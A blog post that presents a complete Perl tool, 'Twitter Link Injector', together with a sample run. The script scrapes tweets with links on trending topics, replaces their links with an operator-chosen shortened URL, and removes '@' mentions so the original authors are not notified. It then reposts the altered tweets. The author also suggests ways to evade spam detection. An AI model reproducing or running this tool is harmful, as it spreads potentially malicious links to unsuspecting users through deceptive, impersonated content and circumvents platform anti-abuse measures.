Hijacking Links in Trending Topics within Twitter

I have been doing a little bit of work with how twitter users can easily be redirected to url’s that they didn’t intend to go to in the first place. This is a bit concerning, specifically since there is a good probability of it being a malicious url.

I have created a quick perl script that does the following:

  • Grabs the top trends from twitter via JSON
  • Grabs tweets (with links) pertaining to the top trends on twitter
  • Replaces the link that the original user tweeted with our link to the new destination (a randomly picked tweet between 1-10)
    • There is the option of doing multiple url shorteners as discussed in my other blog entry.
    • We also remove ‘@’ so the original tweeter wont notice that we hijacked their link via a notification on twitter about their tweet being re-tweeted
  • Tweets the ‘hijacked’ link back to twitter

Since we are grabbing the trending topics and injecting our link with ones that are already being tweeted we have a good chance of people clicking-through. Although, you may notice there are already spam-bots out there that will tweet a link and it has every other trending topic in the tweet as well… pretty easy to spot. A way to get around this, would be to check our array of tweets and compare to see if there are any other trending topics listed within that tweet. If there are, choose another. I haven’t implemented this since I lost motivation on the project, but it could easily be done.

Sample run:

MB-PR0:twitter-proj jgilmour$ ./twitinject.pl
———————————-
– Twitter Link Injector v0.1 —-
———————————-
usage: ./twitinject.pl <link>
example: ./twitinject.pl http://www.google.com
MB-PR0:twitter-proj jgilmour$ ./twitinject.pl http://techsmog.com/?p=52
url (encoded): http%3A%2F%2Ftechsmog%2Ecom%2F%3Fp%3D52
url (shortened): http://easyuri.com/e13a1
———————————-
– Twitter Link Injector v0.1 —-
———————————-
Top Trend #1: Macaulay Culkin
———————————-
original tweet: Mila Kunis &amp; Macaulay Culkin SPLIT: Breakup For Actor Actress  http://tiny.ly/DAM0
size: 91
sending injected tweet: Mila Kunis &amp; Macaulay Culkin SPLIT: Breakup For Actor Actress  http://easyuri.com/e13a1
———————————-
Top Trend #2: PowerBalance Admits Their
———————————-
original tweet: RT @Gizmodo: PowerBalance Admits Their Wristbands Are a Scam http://gizmodo.com/5723577/
size: 84
sending injected tweet: RT Gizmodo: PowerBalance Admits Their Wristbands Are a Scam http://easyuri.com/e13a1
———————————-
Top Trend #3: Quentin Tarantino
———————————-
original tweet: .. Amazing optical illusion that works ONLY for man?! http://tinyurl.com/2dxm9p8 #Macaulay #Culkin #Quentin #Tarantino #HEAVEN #SHALL #BURN
size: 137
sending injected tweet: .. Amazing optical illusion that works ONLY for man?! http://easyuri.com/e13a1 #Macaulay #Culkin #Quentin #Tarantino #HEAVEN #SHALL #BURN
———————————-
Top Trend #4: Craigs List Killer
———————————-
original tweet: Need a Craigs List Killer?: About The Craigslist Killer The storyline of Boston University med student Philip Ma… http://bit.ly/fsFEha
size: 140
sending injected tweet:  a Craigs List Killer?: About The Craigslist Killer The storyline of Boston University med student Philip Ma… http://easyuri.com/e13a1
———————————-
Top Trend #5: Sanaa Lathan
———————————-
original tweet: ‘Glee’ and women’s sports #Sanaa #Lathan http://bit.ly/e24SqO
size: 65
sending injected tweet: ‘Glee’ and women’s sports #Sanaa #Lathan http://easyuri.com/e13a1
———————————-
Top Trend #6: Pete Postlethwaite
———————————-
original tweet: Pete Postlethwaite Dies http://www.people.com/people/article/0,,20454333,00.html What a phenomenal actor…
size: 78
sending injected tweet: Pete Postlethwaite Dies http://easyuri.com/e13a1 What a phenomenal actor…
———————————-
Top Trend #7: CONFIESO PUBLICAMENTE
———————————-
original tweet: FUBB 5 death car crash OMG… WTF is THIS? http://alturl.com/pjre3 Noel Kahn Dead Birds Drop PowerBalance Admits Their CONFIESO PUBLICAMENTE
size: 141
sending injected tweet:  5 death car crash OMG… WTF is THIS? http://easyuri.com/e13a1 Noel Kahn Dead Birds Drop PowerBalance Admits Their CONFIESO PUBLICAMENTE
———————————-
Top Trend #8: HEAVEN SHALL BURN
———————————-
original tweet: GRITEIIIIIIIII http://newmetaldiscs3.blogspot.com/2011/01/as-i-lay-dying-heaven-shall-burn-south.html
size: 39
sending injected tweet: GRITEIIIIIIIII http://easyuri.com/e13a1
———————————-
Top Trend #9: Harlem Globetrotters
———————————-
original tweet: Know everything about Harlem Globetrotters http://toptoptopics.com/harlem-globetrotters/ #harlemglobetrotters
size: 88
sending injected tweet: Know everything about Harlem Globetrotters http://easyuri.com/e13a1 #harlemglobetrotters
———————————-
Top Trend #10: Angelica Rivera
———————————-
original tweet: http://mujeresmas.com/2009/10/tweets-de-angelica-rivera-circulan-por-la-red/
size: 24
sending injected tweet: http://easyuri.com/e13a1
———————————-

Screen shot (From Twitter):

Code:

#!/usr/bin/perl

use LWP::Simple;
use JSON::XS;
use Regexp::Common;
use Net::Twitter::Lite;

my $nt = Net::Twitter::Lite->new(
	consumer_key	=> 'CHANGEME',
	consumer_secret => 'CHANGEME',
	access_token	=> 'CHANGEME',
	access_token_secret	=> 'CHANGEME'
);

if ($#ARGV != 0) {
    print "----------------------------------\n";
	print "-- Twitter Link Injector v0.1 ----\n";
	print "----------------------------------\n";
    print "usage: ./twitinject.pl <link>\n";
	print "example: ./twitinject.pl http://www.google.com\n";
    exit;
}

$url = urlencode($ARGV[0]);
$injectedurl = obfus($url);

# json url for top trends
my $trendsurl = "http://search.twitter.com/trends.json";
my $gettrend = JSON::XS->new->decode (get($trendsurl));
my $x = 1;
my $toptentrends;

    print "----------------------------------\n";
	print "-- Twitter Link Injector v0.1 ----\n";
	print "----------------------------------\n\n";

# get the trends and assign to $toptentrends[x]
# parse out the '#' as well, for searching
@stuff = @{$gettrend->{trends}};
foreach $thing(@stuff) {
#	print "Trend $x: " . $thing->{name} . "\n";
	$toptentrends[$x] = $thing->{name};
	$toptentrends[$x] =~ s/#//;
	$x++;
}

# do a search with the first top ten trends and get the tweets with links
# iterate through each of the top 10 trends
my $count = 1;
while ($count <= 10) {
	my $searchurl = "http://search.twitter.com/search.json?&q=" . $toptentrends[$count] . "%20filter:links";
	my $getsearches = JSON::XS->new->decode (get($searchurl));
	my $x = 1;
	my $searchresults;

	# assign to searchresults[$x]
	@stuff = @{$getsearches->{results}};
	foreach $thing(@stuff) {
		$searchresults[$x] = $thing->{text};
		$x++
	}

	binmode STDOUT, ":utf8";
	# we pick a random tweet to use (we will always get at least 10 back)
	$random_int = int(rand(10)) + 1;
	print "Top Trend #$count: $toptentrends[$count]\n";
    print "----------------------------------\n";
	print "original tweet: " . $searchresults[$random_int] . "\n";
	$searchresults[$random_int] =~ s!(http://[^\s]+)!$injectedurl!gi;
	$searchresults[$random_int] =~ s!@!!gi;
	$wah = $searchresults[$random_int];
	$moo = length($wah);
	print "size: $moo\n";

	# we check to see if the length is over 140 chars.
	# if it is, we subtract characters to make it fit.
	if (length($wah) >= 140)
		{ $wah = substr($wah,4,140); }
	print "sending injected tweet: " . $wah . "\n";
	my $rez = eval { $nt->update($wah) };
	warn "$@\n" if $@;
	print "----------------------------------\n";

$count++;
}

sub obfus {
	# link shortnener got shut down, but this can be edited to be re-enabled
	#my $request = "http://api.mrte.ch/go.php?action=shorturl&url=" . $_[0] . "&format=simple";
	#my $response = get($request);
	#my $url2 = $response;
	my $response2 = $_[0];
	print "url (encoded): $response2 \n";
	$response2 = urlencode($response2);
	my $request2 = "http://easyuri.com/api.php?link=$response2";
	$response2 = get($request2);
	print "url (shortened): $response2 \n";
	return $response2;
}

# encode the url
sub urlencode {
	my $URL = $_[0];
	$URL =~ s/([\W])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
	return $URL;
}

You will need to edit the consumer_key, consumer_secret, access_token, and access_token_secret fields with what you request from dev.twitter.com.That’s all folks!

One comment

  1. This text is priceless. Where can I find out more?

Leave a Reply

Scroll To Top
Descargar musica